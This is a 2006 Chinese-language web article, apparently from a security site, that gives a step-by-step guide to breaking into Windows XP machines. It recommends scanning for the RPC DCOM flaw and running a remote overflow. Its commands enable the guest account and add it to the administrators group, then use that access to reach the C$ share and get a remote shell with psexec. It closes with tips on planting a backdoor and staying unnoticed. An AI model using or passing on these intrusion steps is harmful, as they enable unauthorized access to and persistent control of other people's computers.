| 入侵xp系统之初步攻略 |
|
| 作者:佚名 来源:安全在线
更新时间:2006-5-4 【字体:小
大】 |
|
<%=(int(rnd()*1)+1)%>您当前的位置:中国安全在线cnsafer.com 请进入[技术论坛]发表评论 阅读提示:
1.思路:突破xp系统远程访问的限制,实现文件传输和远程登陆。
2.工具:rpc漏洞扫描工具、溢出工具,pstools工具包。
3.步骤 1)步骤一:rpc漏洞扫描: 推荐使用retinarpcdcom.exe(eeye公司推出的专门针对RPC漏洞的扫描工具)
2)步骤二:远程溢出:
3)步骤三:提升guest权限(本方案之关键): 命令:net user guest /active:yes net localgroup aministrators guest /add —————————————————————————————— 看到这里,也许你会嗤之以鼻, 可这正是大家忽略的地方,因为guest有与其它所有帐号不同的特性。 如果你用net user guest命令,将会看到下面的内容: Password required No 这正是突破xp系统远程访问帐号限制的突破口! 除了guest外,其它帐号都是 Password required yes 所以就算你有xp系统的管理员帐号密码一样无所作为。 —————————————————————————————— 当guest提升为admin权限后,你试试 dir \\IP\c$Content$nbsp; 呵呵,现在你已经有了读写权限,连ipc$连接都省了~~ 当然你也一样可以用net use \\ip "" /user:"guest"来进行IPC$连接 (不过是多此一举)。 到此,文件传输的问题已经解决!
4)步骤四:远程登陆 我们当然不想每次用溢出登陆对方。 那么就试试opentelnet吧 >opentelnet \\ip guest "" 1 90 read ntlm failed \\shit!用administrator也是这样子。 上传srv.exe试试,我没试过,有兴趣的自己试试。 因为我认为用psexec方便多了。命令如下: psexec \\ip cmd (连ipc$不用开了,爽吧) 5)关于后门: 各显神通,我正好用来试试榕哥的bits.dll,感觉一点都不好, 榕哥的fans可别拿鸡蛋扔我哦~~ 6)注意事项: 千万别在xp系统中建新帐户(为什么?自己想想) xp系统默认只能登陆一个帐户,故用3389的远程登陆是不行的。 rpc溢出会导致对方重启,要慎用,尤其是服务器。
您对本文章有什么意见或着疑问吗?请到论坛讨论您的关注和建议是我们前行的参考和动力 |
| 文章录入:ls1238 责任编辑:ls1238
|
|
上一篇文章: 非法探取密码的原理及安全防范
下一篇文章: 乔客论坛存在的安全隐患 |
| 【字体:小
大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】
|